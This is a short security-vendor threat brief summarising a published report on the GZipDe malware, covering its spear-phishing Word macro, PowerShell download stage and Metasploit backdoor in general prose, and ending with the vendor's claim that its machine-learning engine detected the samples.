What Is It?
Researchers from AlienVault have published a report detailing a new piece of malware called GZipDe. They believe it may be part of a targeted cyber-espionage campaign with the final payload being a Metasploit backdoor. This attack is consistent with a growing trend by threat actors of utilizing standard tools, such as Metasploit, as part of their attack chain. In May, researchers at Eset described a new campaign by Russia-based Advanced Persistent Threat (APT) group Turla which used a Metasploit backdoor as its first stage compromise.
The GZipDe attack begins with a spear phishing email containing a Word document, which includes a malicious Visual Basic macro. The text of the document is an article published by the Middle East North Africa Financial Network in late May 2018, regarding the Shanghai Cooperation Organization Summit in June 2018. The title of this article is “Afghanistan – ‘Shanghai Spirit’ Contributes to Afghan Peace.” Though the text is in English, the document was uploaded to VirusTotal from an IP address located in Afghanistan.
If a user who opens the malicious document is convinced via social engineering to allow the macro to execute, a hidden window launches a PowerShell command to download and execute malware (though a sample wasn’t available at the time of their analysis) which in turn retrieves the GZipDe malware itself. The GzipDe sample is compressed using zip and encrypted with a customized routine in order to avoid signature-based detection. It then downloads the Metasploit backdoor payload that utilizes shellcode in an attempt to avoid detection and, if successful, loads the payload entirely into memory. The backdoor can extract and send system information and receive instructions such as downloading further malware.
How Does It Propagate?
The malware does not contain the necessary code to self-propagate. The attack vector appears to be spear phishing emails containing malicious documents, which still require socially engineering the recipient to allow the malicious macro to execute.
When/How Did BluVector Detect It?
There are four samples publicly available related to this attack and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown that these GZipDe samples would have been detected an average of 28 months prior to their release.